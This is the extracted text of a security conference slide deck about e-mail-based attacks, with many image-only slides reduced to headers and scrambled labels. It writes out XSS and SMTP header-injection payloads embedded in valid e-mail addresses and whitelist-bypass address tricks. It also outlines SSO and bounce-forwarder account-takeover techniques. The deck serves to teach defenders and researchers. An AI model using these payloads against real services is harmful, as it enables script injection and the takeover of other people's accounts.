Professional Documents
Culture Documents
You Ve Got Pwned
You Ve Got Pwned
@securinti - @intigriti
Mandatory introduction slide for credibility
👨💻 Inti De Ceukelaire
✉ I like e-mails
💌 Confidential information
⚙ Complex logic
🗝 Outdated security
🌐 It’s everywhere
@securinti - @intigriti
E-mail address
john.smith@example.com
@securinti - @intigriti
The local part (john.doe)
@securinti - @intigriti
The local part, quoted (“john.doe”)
@securinti - @intigriti
Special case: wildcards & comments
@securinti - @intigriti
The domain part (example.com)
● More strict
● Digits
○ john.doe@[127.0.0.1]
○ john.doe@[IPv6:2001:db8::1]
@securinti - @intigriti
Let’s construct
some payloads!
@securinti - @intigriti
These are all valid e-mail addresses
XSS test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
(Email) "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
Header injection "recipient@test.com>\r\nRCPT TO:<victim+"@test.com
@securinti - @intigriti
Defeating e-mail address domain whitelists
● inti(;inti@inti.io;)@whitelisted.com
→ inti(;
→ inti@inti.io → my inbox!
→ ;)@whitelisted.com
● inti@inti.io(@whitelisted.com)
● inti+(@whitelisted.com;)@inti.io
@securinti - @intigriti
HTML injection in gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com
@securinti - @intigriti
This led to wormable XSS in
multiple popular e-mail clients
@securinti - @intigriti
Bypassing
strict e-mail validators
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
@securinti - @intigriti
Differences in SSO providers
XSS payloads
in email addresses?
NO
YES
NO
NO
YES
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
@securinti - @intigriti
Bypassing strict e-mail validators through SSO chains & integrations
NO XSS here
But I found something better.
@securinti - @intigriti
Differences in SSO providers
XSS payloads
Unverified e-mails?
in email addresses?
NO NO
YES NO
NO NO
NO NO
YES YES*
*verification status is sent within the idp response, but not mandatory
@securinti - @intigriti
@securinti - @intigriti
@securinti - @intigriti
@securinti - @intigriti
@securinti - @intigriti
Doesn’t work to hijack GitLab accounts 😔
@securinti - @intigriti
@securinti - @intigriti
@securinti - @intigriti
My actual forum account:
securinti@wearehackerone.com (confirmed)
@securinti - @intigriti
Attacker account (confirmation bypassed) My actual forum account:
securinti@wearehackerone.com (“confirmed”) securinti@wearehackerone.com (confirmed)
@securinti - @intigriti
FA RE
A
K
A C E GI AC L FO
CO
C O TLA
UN UN RUM
T B T
@securinti - @intigriti
FA RE
A
K
A C E GI AC L FO
CO
C O TLA
UN UN RUM
T B T
@securinti - @intigriti
FA
K
A C E GI RE
A
C O TLA AC L FO
UN
T B CO
UN RUM
T
@securinti - @intigriti
AC RE
TA C O U N A
AC L FO
KE
OV T CO
ER UN RUM
! T
@securinti - @intigriti
@securinti - @intigriti
Shoutout to Ron Chan (@ngalog)
@securinti - @intigriti
Let’s start sending
e-mails
@securinti - @intigriti
arrives bounces
@securinti - @intigriti
arrives bounces
@securinti - @intigriti
⚠ PSA ⚠
Don’t be a spammer
Seek permission
Reduce noise
State your intentions
@securinti - @intigriti
Verifying the existence of e-mail addresses (NO SPAM)
● VRFY SMPT command
VRFY Smith
R: 251 User not local; will forward to <Smith@USC-ISIQ.ARPA>
● SETTING RCPT TO
@securinti - @intigriti
Tools and API’s
@securinti - @intigriti
E-mail based recon
@securinti - @intigriti
E-mail based recon
@securinti - @intigriti
E-mail based recon - test@
@securinti - @intigriti
E-mail based recon - test@
@securinti - @intigriti
E-mail based recon - free Slack invite
@securinti - @intigriti
E-mail based recon - using printer as inbox
@securinti - @intigriti
E-mail based recon - print@ 🖨
● On-site testing
● Public printers
● Social engineering
● Only works if code
is written out in text
(no buttons like Slack)
@securinti - @intigriti
E-mail based recon - autoresponders
@securinti - @intigriti
E-mail based recon - autoresponders
@securinti - @intigriti
E-mail based recon - autoresponders
@securinti - @intigriti
E-mail based recon - autoresponders
@securinti - @intigriti
E-mail based recon - autoresponders
@securinti - @intigriti
Blind attacks through e-mail
1. Blind XSS in HTML e-mails
a. Include template injection payloads!
@securinti - @intigriti
arrives bounces
@securinti - @intigriti
@securinti - @intigriti
What I see What the owner sees
Google
forwarder
@securinti - @intigriti
What I see What the owner sees
Google
forwarder
Inbox full
@securinti - @intigriti
What I see: What the owner sees
bounce with data
owner
email
document
title
Includes:
- Sharing link
- Title
@securinti - @intigriti
SPF
Sender Policy Framework
DKIM
DomainKeys Identified Mail
@securinti - @intigriti
SPF
Sender Policy Framework
y sb
ounc
e
lwa
A
DMARC
DomainKeys Identified Mail
@securinti - @intigriti
Forwarders in real life
1. admin@shadywebsite.com (de-anonymise ransomware)
backupdata.company@malicious.com ???@gmail.com
bounce
Unmaske
d!
*This is a reconstruction
@securinti - @intigriti
Forwarders in real life
2. User e-mail aliasses:
intidc@intigriti.me
intidc @wearehackerone.com
intidc @bugcrowdninja.com
@securinti - @intigriti
Hacking our own @intigriti.me forwarder
@securinti - @intigriti
Hacking our own @intigriti.me forwarder
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environments
saas-app.com
saasapp.alice.com saasapp.tools.john.io
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
t Password reset mail
rese no-reply@john.io
ord
ssw
Pa
saasapp.alice.com saasapp.tools.john.io
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
t Password reset mail
rese no-reply@john.io
ord
ssw
Pa
saasapp.alice.com saasapp.tools.john.io
john@john.io
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
saasapp.alice.com saasapp.tools.john.io
O
SS
*adds alice to tenant*
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com e
r alic
o
et f Password reset mail
d res no-reply@john.io
r
ss wo
Pa
saasapp.alice.com saasapp.tools.john.io
O
SS
*adds alice to tenant*
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
t Password reset mail
rese no-reply@john.io
ord
ssw
Pa
saasapp.alice.com saasapp.tools.john.io
alice@alice.com
S SO
*adds alice to tenant*
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
t Password reset mail
rese no-reply@john.io (STRICT DKIM)
ord
ssw
Pa
saasapp.alice.com saasapp.tools.john.io
alice@alice.com
S SO
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
t Password reset mail
rese no-reply@john.io (STRICT DKIM)
ord
ssw
Pa
BOUNCE
saasapp.alice.com saasapp.tools.john.io
alice@alice.com
S SO
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets
saas-app.com
t Password reset mail
rese no-reply@john.io (STRICT DKIM)
ord
ssw
Pa
BOUNCE
saasapp.alice.com saasapp.tools.john.io
alice@alice.com
S SO
*has Alice’s password reset*
Alice John
@securinti - @intigriti
Forwarders in real life
3. Branded multi-tenant environmets: account takeover, no user interaction
saas-app.com
t Password reset mail
rese no-reply@john.io (STRICT DKIM)
ord
ssw
Pa
BOUNCE
saasapp.alice.com saasapp.tools.john.io
alice@alice.com
*Access to alice.com
using Alice’s account*
Alice John
@securinti - @intigriti
Thank you!
@intigriti - @securinti
@securinti - @intigriti